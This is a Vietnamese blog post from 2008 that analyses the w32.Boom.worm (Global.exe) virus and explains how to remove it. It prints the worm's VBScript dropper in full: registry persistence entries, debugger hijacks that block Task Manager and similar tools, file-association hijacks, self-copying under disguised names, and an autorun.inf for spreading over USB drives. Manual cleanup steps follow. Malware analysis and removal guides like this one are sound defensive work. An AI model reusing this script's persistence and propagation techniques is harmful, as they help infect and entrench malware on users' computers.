Jun 28, 2008
111 Views

Diệt virus Global.exe (w32.Boom.worm)

Written by

Tạo các process :
C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}svchost.exe
Path thật : C:WINDOWSsystem32dllcachesvchost.exe
C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}system.exe
Path thật : C:WINDOWSsystem32dllcachesystem.exe
C:WINDOWSsystem32dllcacheRecycler.{645FF040-5081-101B-9F08-00AA002F954E}Global.exe
Path thật : C:WINDOWSsystem32dllcacheGlobal.exe

Các process này cùng chạy và bảo vệ lẫn nhau (Khi bạn Kill 1 process thì các process còn lại sẽ gọi lại process vừa bị Kill)

Thay đổi các giá trị sau trong Registry :

Các giá trị lưu trữ vào C:WINDOWSCursorsBoom.vbs và được thực thi :
dim fs,rg
set fs = createobject(“scripting.filesystemobject”)
set rg = createobject(“wscript.shell”)
on error resume next
rg.regwrite “HKCR.vbs”, “VBSFile”
rg.regwrite “HKCUControl PanelDesktopSCRNSAVE.EXE”, ” C:WINDOWSpchealthhelpctrbinariesHelpHost.com”
rg.regwrite “HKCUControl PanelDesktopScreenSaveTimeOut”, “30”
rg.regwrite “HKCRMSCFileShellOpenCommand”, “C:WINDOWSpchealthGlobal.exe”
rg.regwrite “HKCRregfileShellOpenCommand”, “C:WINDOWSpchealthGlobal.exe”
rg.regwrite “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRu nOnce”, “C:WINDOWSsystem32dllcacheDefault.exe”
rg.regwrite “HKCUSOFTWAREMicrosoftWindowsCurrentVersionRu nOnce”, “C:WINDOWSsystem32dllcacheDefault.exe”
rg.regwrite “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRu n”, “C:WINDOWSsystemKEYBOARD.exe”
rg.regwrite “HKEY_CLASSES_ROOTMSCFileShellOpenCommand “, “C:WINDOWSFontsFonts.exe”
rg.regwrite “HKCUSoftwarePoliciesMicrosoftWindowsSystemS criptsLogoffDisplayName”,”Local Group Policy”
rg.regwrite “HKCUSoftwarePoliciesMicrosoftWindowsSystemS criptsLogoffFileSysPath”,””
rg.regwrite “HKCUSoftwarePoliciesMicrosoftWindowsSystemS criptsLogoffGPO-ID”,”LocalGPO”
rg.regwrite “HKCUSoftwarePoliciesMicrosoftWindowsSystemS criptsLogoffGPOName”,”Local Group Policy”
rg.regwrite “HKCUSoftwarePoliciesMicrosoftWindowsSystemS criptsLogoffSOM-ID”,”Local”
rg.regwrite “HKCUSoftwarePoliciesMicrosoftWindowsSystemS criptsLogoffParameters”,””
rg.regwrite “HKCUSoftwarePoliciesMicrosoftWindowsSystemS criptsLogoffScript”,”C:WINDOWSCursorsBoom .vbs”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsShutdownDisplayName”, “Local Group Policy”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsShutdownFileSysPath”, “”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsShutdownGPO-ID”, “LocalGPO”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsShutdownGPOName”, “Local Group Policy”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsShutdownSOM-ID”, “Local”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsShutdownParameters”, “”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsShutdownScript”, “C:WINDOWSCursorsBoom.vbs”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsStartupDisplayName”, “Local Group Policy”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsStartupFileSysPath”, “”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsStartupGPO-ID”, “LocalGPO”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsStartupGPOName”, “Local Group Policy”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsStartupSOM-ID”, “Local”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsStartupParameters”, “”
rg.regwrite “HKLMSoftwarePoliciesMicrosoftWindowsSystemS criptsStartupScript”, “C:WINDOWSCursorsBoom.vbs”
If Not fs.fileexists(“C:WINDOWSFontsFonts.exe”) Then fs.copyfile (“C:WINDOWSHelpmicrosoft.hlp”), (“C:WINDOWSFontsFonts.exe”)
If Not fs.fileexists(“C:WINDOWSpchealthhelpctrbinarie sHelpHost.com”) Then fs.copyfile (“C:WINDOWSHelpmicrosoft.hlp”), (“C:WINDOWSpchealthhelpctrbinariesHelpHost.co m”)
If Not fs.fileexists(“C:WINDOWSpchealthGlobal.exe”) Then fs.copyfile (“C:WINDOWSHelpmicrosoft.hlp”), (“C:WINDOWSpchealthGlobal.exe”)
If Not fs.fileexists(“C:WINDOWSsystemKEYBOARD.exe”) Then fs.copyfile (“C:WINDOWSHelpmicrosoft.hlp”), (“C:WINDOWSsystemKEYBOARD.exe”)
If Not fs.fileexists(“C:WINDOWSsystem32dllcacheDefaul t.exe”) Then fs.copyfile (“C:WINDOWSHelpmicrosoft.hlp”), (“C:WINDOWSsystem32dllcacheDefault.exe”)
If Not fs.fileexists(“C:windowssystem32driversdrivers .cab.exe”) Then fs.copyfile (“C:WINDOWSHelpmicrosoft.hlp”), (“C:windowssystem32driversdrivers.cab.exe “)
If Not fs.fileexists(“C:windowsmediarndll32.pif “) Then fs.copyfile (“C:WINDOWSHelpmicrosoft.hlp”), (“C:windowsmediarndll32.pif”)
If Not fs.fileexists(“C:windowsfontstskmgr.exe”) Then fs.copyfile (“C:WINDOWSHelpmicrosoft.hlp”), (“C:windowsfontstskmgr.exe”)

Được ghi bởi file thực thi :

Để kích hoạt virus:
HKCUControl PanelDesktopSCRNSAVE.EXE
HKCRMSCFileShellOpenCommand
HKCRregfileShellOpenCommand
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsctfmon.exeDebugger
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionstaskmgr.exeDebugger
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsboot.exeDebugger
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsautorun.exeDebugger
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsautoruns.exeDebugger
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsauto.exeDebugger
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsmsconfig.exeDebugger
HKLMSOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionsprocexp.exeDebugger
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun Once
HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun Once
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun
HKLMSOFTWAREMicrosoftWindowsCurrentVersionpol iciesExplorerRunsys

Để thay đổi các thuộc tính khác:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurre ntVersionExplorerAdvancedShowSuperHidden
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurr entVersionExplorerAdvancedFolderSuperHiddenVa lueName
HKLMSoftwareMicrosoftWindowsCurrentVersionPol iciesSystemDisableStatusMessages
HKCUSoftwarePoliciesMicrosoftWindowsSystemSc riptsLogoffDisplayName
HKCUSoftwarePoliciesMicrosoftWindowsSystemSc riptsLogoffFileSysPath
HKCUSoftwarePoliciesMicrosoftWindowsSystemSc riptsLogoffGPO-ID
HKCUSoftwarePoliciesMicrosoftWindowsSystemSc riptsLogoffGPOName
HKCUSoftwarePoliciesMicrosoftWindowsSystemSc riptsLogoffSOM-ID
HKCUSoftwarePoliciesMicrosoftWindowsSystemSc riptsLogoffParameters
HKCUSoftwarePoliciesMicrosoftWindowsSystemSc riptsLogoffScript
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsShutdownDisplayName
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsShutdownFileSysPath
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsShutdownGPO-ID
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsShutdownGPOName
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsShutdownSOM-ID
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsShutdownParameters
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsShutdownScript
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsStartupDisplayName
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsStartupFileSysPath
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsStartupGPO-ID
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsStartupGPOName
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsStartupSOM-ID
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsStartupParameters
HKLMSoftwarePoliciesMicrosoftWindowsSystemSc riptsStartupScript
Ngoài ra còn khá nhiều địa chỉ khác trong virus nhưng ko hiẻu sao DC không thấy các địa chỉ này bị thay đổi khi bị nhiễm virus.

Tạo tập tin Autoruns.inf với nội dung như sau trong mỗi ổ đĩa (Đĩa cứng và USB) :
[autorun] Open=MS-DOS.com
Shellexecute=MS-DOS.com
ShellOpencommand=MS-DOS.com
ShellExplorecommand=MS-DOS.com

Đường dẫn các tập tin là nhân bản của virus :
C:WINDOWSsystem32dllcachesvchost.exe
C:WINDOWSsystem32dllcacheGlobal.exe
C:WINDOWSpchealthhelpctrbinariesHelpHost.com
C:WINDOWSsystem32dllcachesystem.exe
C:WINDOWSFontsFonts.exe
C:WINDOWSsystem32driversdrivers.cab.exe
C:WINDOWSsystem32dllcacheGlobal.exe
C:WINDOWSsystem32dllcachesvchost.exe
C:WINDOWSsystemKEYBOARD.exe
C:WINDOWSsystem32dllcacheDefault.exe
C:WINDOWSsystem32regedit.exe
C:WINDOWSFontstskmgr.exe
C:WINDOWSMediarndll32.pif
C:WINDOWSCursorsBoom.vbs

Hoạt động :
– Thiết lập chế độ ẩn (Hidden) cho tất cả thư mục trên đĩa USB và tự Copy mình và với tên thư mục tại đường dẫn tương ứng.
– Khởi động mỗi khi khởi động máy.
– Khởi động mỗi khi mở mỗi đĩa cứng trên máy hay USB bằng cách đúp chuột.
– Chặn sự làm việc của các chương trình tên :
ctfmon.exe
taskmgr.exe
boot.exe
autorun.exe
autoruns.exe
auto.exe
msconfig.exe
procexp.exe

Thay vào đó là sự khởi động của virus tại các Path khác nhau.
– Sử dụng 2 hàm API sndPlaySound và mciSendString tại thư viện winmm.dll để play file C:WINDOWSFontswav.wav
– 3 process cùng hoạt động nên rất khó Kill nếu dùng cách thông thường.

Tiêu diệt :
1. Đổi tên ProcessXP cho khác tên procexp.exe như mặc định tải từ trang chủ của nó.
– Đổi tên Autoruns.exe tương tự như đã nói với ProcessXP.

– Có thể thay thế ProcessXP bằng các Soft quản lý tiên trình hệ thống bất kỳ cho phép Suspend hay tốt nhất là có khả năng Kill nhiều tiến trình cùng lúc (Như IceSword hay Process Viewer).

1. Khởi động ProcessXP.- Suspend lần lượt cả 3 tiến trình đã nói ở phần trên. Sau đó Kill chúng.

– Khởi động Autoruns với tên file mới (Ko để giống các tên file đã liệt kê ở phân Hoạt động là được rồi).
Bỏ dấu chọn (Hoặc xóa luôn) các giá trị bị DC vẽ ở đây :

2. Dùng Total Commander hay bất kỳ phần mềm nào cho phép xem các file, thư mục thiết lập chế độ ẩn (Vấn đề thiết lập làm sao để có thể xem các file ẩn, bạn có thể xem các tài liệu trươc của DC) và xóa các file sau :
C:WINDOWSsystem32dllcachesvchost.exe
C:WINDOWSsystem32dllcacheGlobal.exe
C:WINDOWSpchealthhelpctrbinariesHelpHost.com
C:WINDOWSsystem32dllcachesystem.exe
C:WINDOWSFontsFonts.exe
C:WINDOWSsystem32driversdrivers.cab.exe
C:WINDOWSsystem32dllcacheGlobal.exe
C:WINDOWSsystem32dllcachesvchost.exe
C:WINDOWSsystemKEYBOARD.exe
C:WINDOWSsystem32dllcacheDefault.exe
C:WINDOWSsystem32regedit.exe
C:WINDOWSFontstskmgr.exe
C:WINDOWSMediarndll32.pif
C:WINDOWSCursorsBoom.vbs
Tại mỗi ổ đĩa trên máy bạn, bạn tìm và xóa 2 file :
autoruns.inf
MS-DOS.com

3. Khởi động Registry
(Không được truy cập bằng cách Start-> Run… -> Nhập regedit rồi Enter, virus sẽ hoạt động lại nếu bạn chưa xóa các file đã liệt kê).
Bạn làm như sau : Start-> Run… -> Nhập c:windowsregedit.exe rồi Enter
Sở dĩ bạn phải làm như vậy vì lúc này path : C:WINDOWSsystem32regedit.exe là virus, nếu bạn làm theo thao tac thông thường chính là gọi lài virus.
Còn tại Path c:windowsregedit.exe vẫn là Registry thật.

Vào key HKEY_CLASSES_ROOTMSCFileShellOpenCommand -> Gía trị hiện nay là C:WINDOWSFontsFonts.exeHãy sửa lại giá trị này thành : %SystemRoot%System32mmc.exe “%1” %*

Vào key HKCRregfileShellOpenCommand -> Gía trị hiện nay là C:WINDOWSsystem32dllcacheGlobal.exe
Hãy sửa lại giá trị này thành : regedit.exe “%1”

Để phục hồi các thư mục bị ẩn trong USB bạn có thể xem bài viết diệt virus Lotovn của DC đã Post lên VirusVN.com

Chú ý :
Cũng như khi tiêu diệt virus Kavo, bạn không được truy xuất dữ liệu trên máy tính bằng cach nháy đúp vào chúng mà bạn nên nhập giá trị ổ đĩa muôn truy xuất vào thanh Address rồi Enter để truy xuất.
Hoặc trong suốt quá trình làm việc nên dùng phần mềm thay thế Windows Explorer như Total Commander hay Norton Commander.

Article Tags:
· · · · · · ·
Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/